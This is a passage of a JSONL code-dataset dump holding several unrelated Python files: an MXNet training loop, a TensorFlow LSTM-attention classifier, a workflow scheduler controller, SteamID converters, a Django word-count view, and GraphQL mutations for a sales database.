done')\n\n\n# ## 4. 
Training Procedure\n\n# In[12]:\n\n\ndef evaluate_accuracy_loss(net, loader, criterion, ctx):\n metric = mx.metric.Accuracy()\n loss = 0\n sample_cnt = 0\n \n for i, (X, y) in enumerate(loader):\n X, y = X.as_in_context(ctx), y.as_in_context(ctx)\n \n y_hat = net(X)\n l = criterion(y_hat, y)\n \n metric.update(labels=[y], preds=[y_hat])\n loss += l.sum().asscalar()\n sample_cnt += X.shape[0]\n \n return metric.get(), loss / sample_cnt\n\n\n# In[13]:\n\n\nanimator = vis.Animator(\n title=model_name, xlabel='epoch',\n legend=['train-acc', 'train-loss', 'val-acc', 'val-loss'],\n xlim=[0, cfg.NEPOCHS],\n figsize=(8, 6)\n)\n\nLR_DECAY_EPOCHS = [40, 70] + [np.inf]\nlr_decay_idx = 0\n\ntrain_metric = mx.metric.Accuracy()\nbest_val_acc = 0\n\nfor epoch in range(cfg.NEPOCHS):\n train_metric.reset()\n train_loss_total = 0\n sample_cnt = 0\n \n if epoch == LR_DECAY_EPOCHS[lr_decay_idx]:\n trainer.set_learning_rate(trainer.learning_rate * cfg.LR_DECAY_FACTOR)\n lr_decay_idx += 1\n \n for i, (X, y) in enumerate(train_loader):\n X, y = X.as_in_context(ctx), y.as_in_context(ctx)\n \n with autograd.record():\n y_hat = net(X)\n l = criterion(y_hat, y)\n l.backward()\n trainer.step(X.shape[0])\n \n train_metric.update(labels=[y], preds=[y_hat])\n train_loss_total += l.sum().asscalar()\n sample_cnt += X.shape[0]\n \n name, train_acc = train_metric.get()\n train_loss = train_loss_total / sample_cnt\n \n if (i+1) % 50 == 0 or i+1 == len(train_loader):\n animator.add(epoch + i/len(train_loader), \n (train_acc, train_loss, None, None))\n \n (name, val_acc), val_loss = evaluate_accuracy_loss(net, test_loader, criterion, ctx)\n animator.add(epoch+1, (None, None, val_acc, val_loss))\n \n if best_val_acc < val_acc:\n best_val_acc = val_acc\n saved_model_name = '{}-epoch-{:02d}-acc-{:.4f}.params'.format(\n model_name.lower(), epoch+1, best_val_acc)\n net.save_parameters(os.path.join(cfg.CHECKPOINTS, saved_model_name))\n \n LOG(INFO, 'Epoch:', epoch+1)\n LOG(INFO, '\\ttrain-acc: {:.6f}'.format(train_acc))\n LOG(INFO, '\\ttrain-loss: {:.6f}'.format(train_loss))\n LOG(INFO, '\\tval-acc: {:.6f}'.format(val_acc))\n LOG(INFO, '\\tval-loss: {:.6f}'.format(val_loss))\n \n \nhistory_image_name = '{}-acc-{:.4f}.png'.format(model_name.lower(), best_val_acc)\nanimator.savefig(save_path=os.path.join(cfg.HISTORY, history_image_name))\n\nLOG(INFO, 'Training Procedure done')\n\n\n# ## 5. 
Test Procedure\n\n# ### 5.1 Load Trained Model\n\n\n\n\n\n","sub_path":"cifar10-end2end.py","file_name":"cifar10-end2end.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613149298","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import rnn\n# from attention import attention\n\n\nclass LSTM_Network(object):\n \"\"\"\n Lstm Network\n \"\"\"\n def __init__(self, vocab_size_, dropout_value_, embedding_dim_, forget_bias_, rnn_num_units):\n \"\"\"\n Multi layer Bi-directional LSTM\n In a single layer RNN, the output is produced by passing it through a single hidden\n state which fails to capture hierarchical (think temporal) structure of a sequence.\n With a multi-layered RNN, such structure is captured which results in better performance.\n :param vocab_size_:\n vocabulary size\n :param dropout_value_:\n dropout for neurons\n :param embedding_dim_:\n word_embedding dimension\n :param forget_bias_:\n forget_bias for LSTM cell gates {default : 1}\n Including a bias of 1 to the forget gate of every LSTM cell is also shown to improve performance.\n :param rnn_num_units:\n # of units Lstm cell\n :return\n loss\n prediction\n probability\n logits\n accuracy\n :raise:\n if input shape is different from placeholder shape:\n ValueError: Cannot feed value of shape\n if Any layer output shape is not compatible for next layer input shape :\n { ex : output shape of rnn to input shape of fully connected layer }\n ValueError: Dimensions must be equal\n if not reset the graph:\n ValueError: Attempt to have a second RNNCell use the\n weights of a variable scope that already has weights\n \"\"\"\n tf.reset_default_graph()\n\n\n # placeholders\n sentence_input = tf.placeholder(\n name='input',\n shape=[None, None],\n dtype=tf.int32)\n\n label_s = tf.placeholder(\n name='output',\n shape=[None, ],\n dtype=tf.int32\n\n )\n\n dropout_mode = tf.placeholder(\n name='mode',\n shape=(),\n dtype=tf.int32\n )\n\n self.placeholder = {\n\n 'input': sentence_input,\n 'label_s': label_s,\n 'dropout_mode': dropout_mode\n\n }\n\n sequence_len = tf.count_nonzero(sentence_input, axis=-1)\n # sequence length for rnn unfolding\n\n dropout = tf.cond(\n tf.equal(dropout_mode, 0), # If\n lambda: dropout_value_, # True\n lambda: 0. # False\n )\n\n # word_embedding and embedding lookup\n word_embedding_ = tf.get_variable(name='embeddings_',\n shape=[vocab_size_, embedding_dim_],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n embedding_lookup = tf.nn.embedding_lookup(word_embedding_, sentence_input)\n\n with tf.variable_scope('encoder'):\n # forward cell of Bi-directional lstm network\n\n\n\n def fr_cell():\n fr_cell_lstm = rnn.LSTMCell(num_units=rnn_num_units, forget_bias=forget_bias_)\n\n return rnn.DropoutWrapper(cell=fr_cell_lstm, output_keep_prob=1. - dropout, dtype=tf.float32)\n # dropout layer for forward cell\n\n # Forward RNNCells as its inputs and wraps them into a single cell\n\n fr_cell_m = rnn.MultiRNNCell([fr_cell() for _ in range(1)], state_is_tuple=True)\n # fr_initial_cell = fr_cell_m.zero_state(batch_size=batch_size,dtype=tf.float32)\n\n\n\n with tf.variable_scope('encoder'):\n # backward cell for Bi-directional lstm network\n\n\n\n def bw_cell():\n bw_cell_lstm = rnn.LSTMCell(num_units=rnn_num_units, forget_bias=forget_bias_)\n\n return rnn.DropoutWrapper(cell=bw_cell_lstm, output_keep_prob=1. 
- dropout, dtype=tf.float32)\n # droput layer for backward cell\n\n # Backward RNNCells as its inputs and wraps them into a single cell\n\n bw_cell_m = rnn.MultiRNNCell([bw_cell() for _ in range(1)], state_is_tuple=True)\n\n\n # bw_initial_cell = bw_cell_m.zero_state(batch_size=batch_size,dtype=tf.float32)\n\n\n # return of Bi-directional lstm network :\n\n # A tuple (outputs, output_states) where:\n\n # outputs : A tuple (output_fw, output_bw) containing the forward and the backward rnn output Tensor #batch_size, max_time, cell_fw.output_size]\n # output_states : A tuple ( state.cT , state.hT ) containing the shape [Batch_size,num_inputs] and has the final cell state cT and output state hT of each batch sequence.\n\n # Bi-directional lstm network\n with tf.variable_scope('encoder') as scope:\n model, (state_c, state_h) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=fr_cell_m, # forward cell\n cell_bw=bw_cell_m, # backward cell\n inputs=embedding_lookup, # 3 dim embedding input for rnn\n sequence_length=sequence_len, # sequence len == batch_size\n\n # initial_state_fw=fr_initial_cell,\n\n # initial_state_bw=bw_initial_cell,\n dtype=tf.float32\n\n )\n\n transpose = tf.concat(model, 2)\n \n #Attention_layer \n \n x_attention = tf.reshape(transpose,[-1,rnn_num_units*2])\n attention_size=tf.get_variable(name='attention',shape=[rnn_num_units*2,1],dtype=tf.float32,initializer=tf.random_uniform_initializer(-0.01,0.01))\n bias_ = tf.get_variable(name='bias_',shape=[1],dtype=tf.float32,initializer=tf.random_uniform_initializer(-0.01,0.01))\n linear_projection = tf.add(tf.matmul(x_attention,attention_size),bias_)\n# print(sentence_input.shape[0])\n reshape_ = tf.reshape(linear_projection,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1],-1])\n attention_output=tf.nn.softmax(reshape_,dim=1)\n \n atten_visualize=tf.reshape(attention_output,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1]],name='plot_dis')\n \n multi = tf.multiply(attention_output,transpose)\n \n\n atten_out_s = tf.reduce_sum(multi,1)\n\n# attention_visualize = tf.reshape(atten_out,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1]])\n \n \n \n \n \n \n\n\n \n\n \n \n \n \n\n# state_output = tf.concat([state_c[0].c, state_h[0].c], axis=-1)\n\n # Attention Mechanism\n\n # Attention_output,alphas= attention(transpose ,30, return_alphas=True,time_major=False)\n\n\n# # will return [batch_size, output_state_size]\n weights = tf.get_variable(name='weights',\n shape=[2*rnn_num_units, 2],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n bias = tf.get_variable(name='bias',\n shape=[2],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n logits = tf.add(tf.matmul(atten_out_s, weights),\n bias, name='network_output')\n\n# # # self.check_shapes={'embedding':embedding_lookup,'model':model,'tr':transpose,'atten':attention_output,'al':alphas,'outa':mat_out}\n\n probability_distribution = tf.nn.softmax(logits, name='netout')\n\n prediction = tf.argmax(probability_distribution, axis=-1)\n\n # cross entropy\n ce = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits,\n labels=label_s\n )\n # loss\n loss = tf.reduce_mean(ce)\n\n # accuracy calculation\n\n accuracy_calculation = tf.reduce_mean(tf.cast(\n tf.equal(\n tf.cast(prediction, tf.int32), label_s),\n tf.float32))\n\n self.output = {\n\n\n 'loss': loss,\n 'prob': probability_distribution,\n 'pred': prediction,\n 'logits': logits,\n 'accuracy': accuracy_calculation\n\n }\n\n self.train = 
tf.train.AdamOptimizer().minimize(loss)\n\n\n# uncomment below code for demo\n\n\n# def checking_model(model):\n# with tf.Session() as sess:\n# sess.run(tf.global_variables_initializer())\n# out_now=sess.run(model.output,feed_dict={model.placeholder['input']:np.random.randint(0,10,[16,10]),model.placeholder['label_s']:np.random.randint(0,2,[16,]),model.placeholder['dropout_mode']:0})\n# print(out_now['loss'].shape)\n# print(out_now['prob'].shape)\n \n\n\n# if __name__==\"__main__\":\n\n# model=LSTM_Network(10,0.5,2,1.0,6)\n\n# checking_model(model)\n\n","sub_path":"Models/Lstm_attention.py","file_name":"Lstm_attention.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484360681","text":"import os\nfrom collections import namedtuple\nfrom concurrent import futures\nfrom copy import deepcopy\nfrom os import sep\nfrom xml.etree import cElementTree\nimport uuid\n\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR, EVENT_JOB_ADDED, EVENT_JOB_REMOVED, \\\n EVENT_SCHEDULER_START, EVENT_SCHEDULER_SHUTDOWN, EVENT_SCHEDULER_PAUSED, EVENT_SCHEDULER_RESUMED\nfrom apscheduler.schedulers.base import STATE_PAUSED, STATE_RUNNING, STATE_STOPPED\nfrom apscheduler.schedulers.gevent import GeventScheduler\n\nimport core.config.config\nimport core.config.paths\nfrom core import workflow as wf\nfrom core.case import callbacks\nfrom core.case import subscription\nfrom core.helpers import locate_workflows_in_directory, construct_workflow_name_key, extract_workflow_name\n\n_WorkflowKey = namedtuple('WorkflowKey', ['playbook', 'workflow'])\n\npool = None\nworkflows = None\nthreading_is_initialized = False\n\n\ndef initialize_threading():\n global pool\n global workflows\n global threading_is_initialized\n\n workflows = []\n\n pool = futures.ThreadPoolExecutor(max_workers=core.config.config.num_threads)\n threading_is_initialized = True\n\n\ndef shutdown_pool():\n global pool\n global workflows\n global threading_is_initialized\n\n for future in futures.as_completed(workflows):\n future.result(timeout=core.config.config.threadpool_shutdown_timeout_sec)\n pool.shutdown(wait=False)\n\n workflows = []\n threading_is_initialized = False\n\n\ndef execute_workflow_worker(workflow, start, subs):\n subscription.set_subscriptions(subs)\n workflow.execute(start=start)\n return \"done\"\n\n\nclass Controller(object):\n def __init__(self, name='defaultController', workflows_path=core.config.paths.workflows_path):\n self.name = name\n self.workflows = {}\n self.load_all_workflows_from_directory(path=workflows_path)\n self.instances = {}\n self.tree = None\n\n self.scheduler = GeventScheduler()\n self.scheduler.add_listener(self.__scheduler_listener(),\n EVENT_SCHEDULER_START | EVENT_SCHEDULER_SHUTDOWN\n | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED\n | EVENT_JOB_ADDED | EVENT_JOB_REMOVED\n | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n self.ancestry = [self.name]\n self.paused_workflows = {}\n\n def reconstruct_ancestry(self):\n for key in self.workflows:\n self.workflows[key].reconstruct_ancestry(self.ancestry)\n\n def load_workflow_from_file(self, path, workflow_name, name_override=None, playbook_override=None):\n self.tree = cElementTree.ElementTree(file=path)\n playbook_name = playbook_override if playbook_override else os.path.splitext(os.path.basename(path))[0]\n for workflow in self.tree.iter(tag='workflow'):\n current_workflow_name = workflow.get('name')\n if current_workflow_name == workflow_name:\n if 
name_override:\n workflow_name = name_override\n name = construct_workflow_name_key(playbook_name, workflow_name)\n key = _WorkflowKey(playbook_name, workflow_name)\n self.workflows[key] = wf.Workflow(name=name,\n xml=workflow,\n parent_name=self.name,\n playbook_name=playbook_name)\n break\n else:\n return False\n\n self.add_child_workflows()\n self.add_workflow_scheduled_jobs()\n return True\n\n def load_workflows_from_file(self, path, name_override=None, playbook_override=None):\n self.tree = cElementTree.ElementTree(file=path)\n playbook_name = playbook_override if playbook_override else os.path.splitext(os.path.basename(path))[0]\n for workflow in self.tree.iter(tag='workflow'):\n workflow_name = name_override if name_override else workflow.get('name')\n name = construct_workflow_name_key(playbook_name, workflow_name)\n key = _WorkflowKey(playbook_name, workflow_name)\n self.workflows[key] = wf.Workflow(name=name,\n xml=workflow,\n parent_name=self.name,\n playbook_name=playbook_name)\n self.add_child_workflows()\n self.add_workflow_scheduled_jobs()\n\n def load_all_workflows_from_directory(self, path=core.config.paths.workflows_path):\n if not path:\n path = core.config.paths.workflows_path\n for workflow in locate_workflows_in_directory(path):\n self.load_workflows_from_file(os.path.join(path, workflow))\n\n def add_child_workflows(self):\n for workflow in self.workflows:\n playbook_name = workflow.playbook\n children = self.workflows[workflow].options.children\n for child in children:\n workflow_key = _WorkflowKey(playbook_name, extract_workflow_name(child, playbook_name=playbook_name))\n if workflow_key in self.workflows:\n children[child] = self.workflows[workflow_key]\n\n def add_workflow_scheduled_jobs(self):\n for workflow in self.workflows:\n if (self.workflows[workflow].options.enabled\n and self.workflows[workflow].options.scheduler['autorun'] == 'true'):\n schedule_type = self.workflows[workflow].options.scheduler['type']\n schedule = self.workflows[workflow].options.scheduler['args']\n self.scheduler.add_job(self.workflows[workflow].execute, trigger=schedule_type, replace_existing=True,\n **schedule)\n\n def create_workflow_from_template(self,\n playbook_name,\n workflow_name,\n template_playbook='emptyWorkflow',\n template_name='emptyWorkflow'):\n path = '{0}{1}{2}.workflow'.format(core.config.paths.templates_path, sep, template_playbook)\n return self.load_workflow_from_file(path=path,\n workflow_name=template_name,\n name_override=workflow_name,\n playbook_override=playbook_name)\n\n def create_playbook_from_template(self, playbook_name,\n template_playbook='emptyWorkflow'):\n # TODO: Need a handler for returning workflow key and status\n path = '{0}{1}{2}.workflow'.format(core.config.paths.templates_path, sep, template_playbook)\n self.load_workflows_from_file(path=path, playbook_override=playbook_name)\n\n def remove_workflow(self, playbook_name, workflow_name):\n name = _WorkflowKey(playbook_name, workflow_name)\n if name in self.workflows:\n del self.workflows[name]\n return True\n return False\n\n def remove_playbook(self, playbook_name):\n for name in [workflow for workflow in self.workflows if workflow.playbook == playbook_name]:\n del self.workflows[name]\n return True\n return False\n\n def get_all_workflows(self):\n result = {}\n for key in self.workflows.keys():\n if key.playbook not in result:\n result[key.playbook] = []\n result[key.playbook].append(key.workflow)\n return result\n\n def get_all_playbooks(self):\n return list(set(key.playbook for key in 
self.workflows.keys()))\n\n def is_workflow_registered(self, playbook_name, workflow_name):\n return _WorkflowKey(playbook_name, workflow_name) in self.workflows\n\n def is_playbook_registered(self, playbook_name):\n return any(workflow_key.playbook == playbook_name for workflow_key in self.workflows)\n\n def update_workflow_name(self, old_playbook, old_workflow, new_playbook, new_workflow):\n old_key = _WorkflowKey(old_playbook, old_workflow)\n new_key = _WorkflowKey(new_playbook, new_workflow)\n self.workflows[new_key] = self.workflows.pop(old_key)\n self.workflows[new_key].name = construct_workflow_name_key(new_playbook, new_workflow)\n self.workflows[new_key].reconstruct_ancestry([self.name])\n\n def update_playbook_name(self, old_playbook, new_playbook):\n for key in [name for name in self.workflows.keys() if name.playbook == old_playbook]:\n self.update_workflow_name(old_playbook, key.workflow, new_playbook, key.workflow)\n\n def add_workflow_breakpoint_steps(self, playbook_name, workflow_name, steps):\n workflow = self.get_workflow(playbook_name, workflow_name)\n if workflow:\n for step in steps:\n workflow.breakpoint_steps.append(step)\n\n def execute_workflow(self, playbook_name, workflow_name, start='start'):\n global pool\n global workflows\n global threading_is_initialized\n\n key = _WorkflowKey(playbook_name, workflow_name)\n if key in self.workflows:\n workflow = self.workflows[key]\n subs = deepcopy(subscription.subscriptions)\n\n # If threading has not been initialized, initialize it.\n if not threading_is_initialized:\n initialize_threading()\n workflows.append(pool.submit(execute_workflow_worker, workflow, start, subs))\n callbacks.SchedulerJobExecuted.send(self)\n\n def get_workflow(self, playbook_name, workflow_name):\n key = _WorkflowKey(playbook_name, workflow_name)\n if key in self.workflows:\n return self.workflows[key]\n return None\n\n def get_all_workflows_by_playbook(self, playbook_name):\n _workflows = []\n for key in self.workflows.keys():\n if key.playbook == playbook_name:\n _workflows.append(self.workflows[key].name)\n return _workflows\n\n def playbook_to_xml(self, playbook_name):\n all_workflows = [workflow for key, workflow in self.workflows.items() if key.playbook == playbook_name]\n if all_workflows:\n xml = cElementTree.Element('workflows')\n for workflow in all_workflows:\n xml.append(workflow.to_xml())\n return xml\n else:\n return None\n\n def copy_workflow(self, old_playbook_name, new_playbook_name, old_workflow_name, new_workflow_name):\n workflow = self.get_workflow(old_playbook_name, old_workflow_name)\n workflow_copy = deepcopy(workflow)\n workflow_copy.playbook_name = new_playbook_name\n workflow_copy.name = construct_workflow_name_key(new_playbook_name, new_workflow_name)\n\n key = _WorkflowKey(new_playbook_name, new_workflow_name)\n self.workflows[key] = workflow_copy\n self.workflows[key].reconstruct_ancestry([self.name])\n\n def copy_playbook(self, old_playbook_name, new_playbook_name):\n for workflow in [workflow.workflow for workflow in self.workflows if workflow.playbook == old_playbook_name]:\n self.copy_workflow(old_playbook_name, new_playbook_name, workflow, workflow)\n\n def pause_workflow(self, playbook_name, workflow_name):\n workflow = self.get_workflow(playbook_name, workflow_name)\n wf_key = _WorkflowKey(playbook_name, workflow_name)\n self.paused_workflows[wf_key] = uuid.uuid4()\n if workflow:\n workflow.pause()\n return self.paused_workflows[wf_key].hex\n\n def resume_workflow(self, playbook_name, workflow_name, 
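# The pause/resume handshake above mints a uuid4 per workflow key and expects
# the caller to echo its hex back; condensed into a standalone sketch:
import uuid

_paused = {}

def pause(key):
    _paused[key] = uuid.uuid4()
    return _paused[key].hex            # token handed to the caller

def resume(key, token):
    if key in _paused and token == _paused[key].hex:
        return "success"
    return "invalid UUID"

token = pause(("playbook", "wf"))
assert resume(("playbook", "wf"), token) == "success"
assert resume(("playbook", "wf"), "bogus") == "invalid UUID"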
validate_uuid):\n workflow = self.get_workflow(playbook_name, workflow_name)\n wf_key = _WorkflowKey(playbook_name, workflow_name)\n if workflow:\n if validate_uuid == self.paused_workflows[wf_key].hex:\n workflow.resume()\n return \"success\"\n else:\n return \"invalid UUID\"\n return \"error: invalid playbook and/or workflow name\"\n\n def resume_breakpoint_step(self, playbook_name, workflow_name):\n workflow = self.get_workflow(playbook_name, workflow_name)\n if workflow:\n workflow.resume_breakpoint_step()\n\n # Starts active execution\n def start(self):\n if self.scheduler.state != STATE_RUNNING and self.scheduler.state != STATE_PAUSED:\n self.scheduler.start()\n else:\n return \"Scheduler already running.\"\n return self.scheduler.state\n\n # Stops active execution\n def stop(self, wait=True):\n if self.scheduler.state != STATE_STOPPED:\n self.scheduler.shutdown(wait=wait)\n else:\n return \"Scheduler already stopped.\"\n return self.scheduler.state\n\n # Pauses active execution\n def pause(self):\n if self.scheduler.state == STATE_RUNNING:\n self.scheduler.pause()\n elif self.scheduler.state == STATE_PAUSED:\n return \"Scheduler already paused.\"\n elif self.scheduler.state == STATE_STOPPED:\n return \"Scheduler is in STOPPED state and cannot be paused.\"\n return self.scheduler.state\n\n # Resumes active execution\n def resume(self):\n if self.scheduler.state == STATE_PAUSED:\n self.scheduler.resume()\n else:\n return \"Scheduler is not in PAUSED state and cannot be resumed.\"\n return self.scheduler.state\n\n # Pauses active execution of specific job\n def pause_job(self, job_id):\n self.scheduler.pause_job(job_id=job_id)\n\n # Resumes active execution of specific job\n def resume_job(self, job_id):\n self.scheduler.resume_job(job_id=job_id)\n\n # Returns jobs scheduled for active execution\n def get_scheduled_jobs(self):\n self.scheduler.get_jobs()\n\n def __scheduler_listener(self):\n event_selector_map = {EVENT_SCHEDULER_START: (lambda: callbacks.SchedulerStart.send(self)),\n EVENT_SCHEDULER_SHUTDOWN: (lambda: callbacks.SchedulerShutdown.send(self)),\n EVENT_SCHEDULER_PAUSED: (lambda: callbacks.SchedulerPaused.send(self)),\n EVENT_SCHEDULER_RESUMED: (lambda: callbacks.SchedulerResumed.send(self)),\n EVENT_JOB_ADDED: (lambda: callbacks.SchedulerJobAdded.send(self)),\n EVENT_JOB_REMOVED: (lambda: callbacks.SchedulerJobRemoved.send(self)),\n EVENT_JOB_EXECUTED: (lambda: callbacks.SchedulerJobExecuted.send(self)),\n EVENT_JOB_ERROR: (lambda: callbacks.SchedulerJobError.send(self))}\n\n def event_selector(event):\n try:\n event_selector_map[event.code]()\n except KeyError:\n print('Error: Unknown event sent!')\n\n return event_selector\n\n\ncontroller = Controller()\n","sub_path":"core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":14990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461316953","text":"\"\"\"\nConvert SteamIDs into various formats.\n\"\"\"\n\nsteamid64ident = 76561197960265728\n\n\ndef commid_to_steamid(commid):\n \"\"\"\n Convert community id to SteamID2.\n \"\"\"\n steamid = []\n steamid.append('STEAM_0:')\n steamidacct = int(commid) - steamid64ident\n\n if steamidacct % 2 == 0:\n steamid.append('0:')\n else:\n steamid.append('1:')\n\n steamid.append(str(steamidacct // 2))\n\n return ''.join(steamid)\n\n\ndef steamid_to_commid(steamid):\n \"\"\"\n Convert SteamID2 to Community ID.\n \"\"\"\n sid_split = steamid.split(':')\n commid = int(sid_split[2]) * 2\n\n if sid_split[1] 
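# Worked example of the arithmetic behind commid_to_steamid() and
# steamid_to_commid(): a 64-bit community id is steamid64ident + Z*2 + Y
# for a textual id STEAM_0:Y:Z. The sample id is arbitrary.
base = 76561197960265728
commid = 76561197960287930
acct = commid - base                  # 22202
y, z = acct % 2, acct // 2            # parity bit, account number
assert "STEAM_0:%d:%d" % (y, z) == "STEAM_0:0:11101"
assert base + z * 2 + y == commid     # round-trips back to the 64-bit id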
== '1':\n commid += 1\n\n commid += steamid64ident\n return commid\n\n\ndef steamid_to_usteamid(steamid):\n \"\"\"\n Convert SteamID2 to SteamID3.\n \"\"\"\n steamid_split = steamid.split(':')\n usteamid = []\n usteamid.append('[U:1:')\n\n y = int(steamid_split[1])\n z = int(steamid_split[2])\n\n steamacct = z * 2 + y\n\n usteamid.append(str(steamacct) + ']')\n\n return ''.join(usteamid)\n\n\ndef commid_to_usteamid(commid):\n \"\"\"\n Convert community ID to SteamID3.\n \"\"\"\n usteamid = []\n usteamid.append('[U:1:')\n steamidacct = int(commid) - steamid64ident\n\n usteamid.append(str(steamidacct) + ']')\n\n return ''.join(usteamid)\n\n\ndef usteamid_to_commid(usteamid):\n for ch in ['[', ']']:\n if ch in usteamid:\n usteamid = usteamid.replace(ch, '')\n\n usteamid_split = usteamid.split(':')\n commid = int(usteamid_split[2]) + steamid64ident\n\n return commid\n\n\ndef usteamid_to_steamid(usteamid):\n for ch in ['[', ']']:\n if ch in usteamid:\n usteamid = usteamid.replace(ch, '')\n\n usteamid_split = usteamid.split(':')\n steamid = []\n steamid.append('STEAM_0:')\n\n z = int(usteamid_split[2])\n\n if z % 2 == 0:\n steamid.append('0:')\n else:\n steamid.append('1:')\n\n steamacct = z // 2\n\n steamid.append(str(steamacct))\n\n return ''.join(steamid)\n","sub_path":"plugins/navaltf/steamid.py","file_name":"steamid.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"28016446","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport operator\n\ndef homepage(request):\n # return HttpResponse(\"Hello\")\n #return render(request, 'home.html', {'hi':'This is me'})\n\n return render(request, 'home.html')\n\n# def eggs(reqeust):\n# return HttpResponse(\"

    <li>Eggs are great!</li>

    \")\n\ndef count(request):\n fulltext = request.GET['fulltext']\n # print(fulltext)\n wordlist = fulltext.split()\n\n #make empty dictionary\n worddictionary = {}\n\n for word in wordlist:\n if word in worddictionary:\n #Increase\n worddictionary[word] += 1\n else:\n #add to the dictionary\n worddictionary[word] = 1\n\n sortedwords = sorted(worddictionary.items(), key=operator.itemgetter(1), reverse=True)\n # return render(request, 'count.html', {'fulltext':fulltext, 'count':len(wordlist), 'worddictionary':worddictionary.items()})\n return render(request, 'count.html', {'fulltext':fulltext, 'count':len(wordlist), 'sortedwords':sortedwords})\n\ndef about(request):\n # name = 'Garam'\n # nationality = 'South Korea'\n # age = 27\n\n myinfo = {'name':'Garam', 'age':27, 'nationality':'S Korea'}\n return render(request, 'about.html', {'myinfo':myinfo})\n","sub_path":"wordcount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"538380729","text":"import graphene\nfrom models.producto import Producto\nfrom models.cliente import Cliente\nfrom models.venta import Venta\nfrom models.detalleventa import VentaDetalle\nfrom schemas.producto import producObjeto\nfrom schemas.cliente import clienteObjeto\nfrom schemas.venta import ventaObjeto\nfrom schemas.detalleventa import ventaDetalleObjeto\nfrom Conexion.db_session import db_session\n\n#Mutation de agregrar\n\nclass agregarProducto(graphene.Mutation):\n class Arguments:\n nombreProducto = graphene.String()\n stock = graphene.Int()\n precio = graphene.Float()\n fechaCreacion = graphene.Date()\n fechaVencimiento = graphene.Date()\n \n nuevoProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info, nombreProducto, stock, precio, fechaCreacion, fechaVencimiento):\n nuevoProducto = Producto(nombreProducto= nombreProducto, stock= stock, precio= precio, fechaCreacion = fechaCreacion, fechaVencimiento = fechaVencimiento)\n db_session.session.add(nuevoProducto)\n db_session.session.commit()\n return agregarProducto(nuevoProducto = nuevoProducto)\n\nclass agregarCliente(graphene.Mutation):\n class Arguments:\n nombre = graphene.String()\n apellido = graphene.String()\n email = graphene.String()\n \n nuevoCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info, nombre, apellido, email):\n nuevoCliente = Cliente(nombre= nombre, apellido= apellido, correo= email)\n db_session.session.add(nuevoCliente)\n db_session.session.commit()\n return agregarCliente(nuevoCliente = nuevoCliente)\n\nclass agregarVenta(graphene.Mutation):\n class Arguments:\n clienteId = graphene.Int()\n fechaVenta = graphene.Date()\n\n nuevaVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, clienteId, fechaVenta):\n nuevaVenta = Venta(clienteId, fechaVenta)\n db_session.session.add(nuevaVenta)\n db_session.session.commit()\n return agregarVenta(nuevaVenta = nuevaVenta)\n\nclass agregarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVenta = graphene.Int()\n idProducto = graphene.Int()\n cantidad = graphene.Int()\n\n nuevaDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVenta, idProducto, cantidad):\n nuevaDetalleVenta = VentaDetalle(idVenta, idProducto, cantidad)\n db_session.session.add(nuevaDetalleVenta)\n db_session.session.commit()\n return agregarDetalleVenta(nuevaDetalleVenta = nuevaDetalleVenta)\n\n#Mutation Update\n\nclass 
actualizarProducto(graphene.Mutation):\n class Arguments:\n idProducto = graphene.Int()\n nombreProducto = graphene.String()\n stock = graphene.Int()\n precio = graphene.Float()\n fechaCreacion = graphene.Date()\n fechaVencimiento = graphene.Date()\n \n updateProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info,idProducto, nombreProducto, stock, precio, fechaCreacion, fechaVencimiento):\n\n updateProducto = Producto.query.get(idProducto)\n updateProducto.nombreProducto = nombreProducto\n updateProducto.stock = stock\n updateProducto.precio = precio\n updateProducto.fechaCreacion = fechaCreacion\n updateProducto.fechaVencimiento = fechaVencimiento\n\n db_session.session.add(updateProducto)\n db_session.session.commit()\n return actualizarProducto(updateProducto = updateProducto)\n\nclass actualizarCliente(graphene.Mutation):\n class Arguments:\n idCliente = graphene.Int()\n nombre = graphene.String()\n apellido = graphene.String()\n email = graphene.String()\n \n updateCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info,idCliente, nombre, apellido, email):\n updateCliente = Cliente.query.get(idCliente)\n \n updateCliente.nombre = nombre\n updateCliente.apellido = apellido\n updateCliente.email = email\n db_session.session.add(updateCliente)\n db_session.session.commit()\n return actualizarCliente(updateCliente = updateCliente)\n\nclass actualizarVenta(graphene.Mutation):\n class Arguments:\n ventaId = graphene.Int()\n clienteId = graphene.Int()\n fechaVenta = graphene.Date()\n\n updateVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, ventaId, clienteId, fechaVenta):\n updateVenta = Venta.query.get(ventaId)\n\n updateVenta.clienteId = clienteId\n 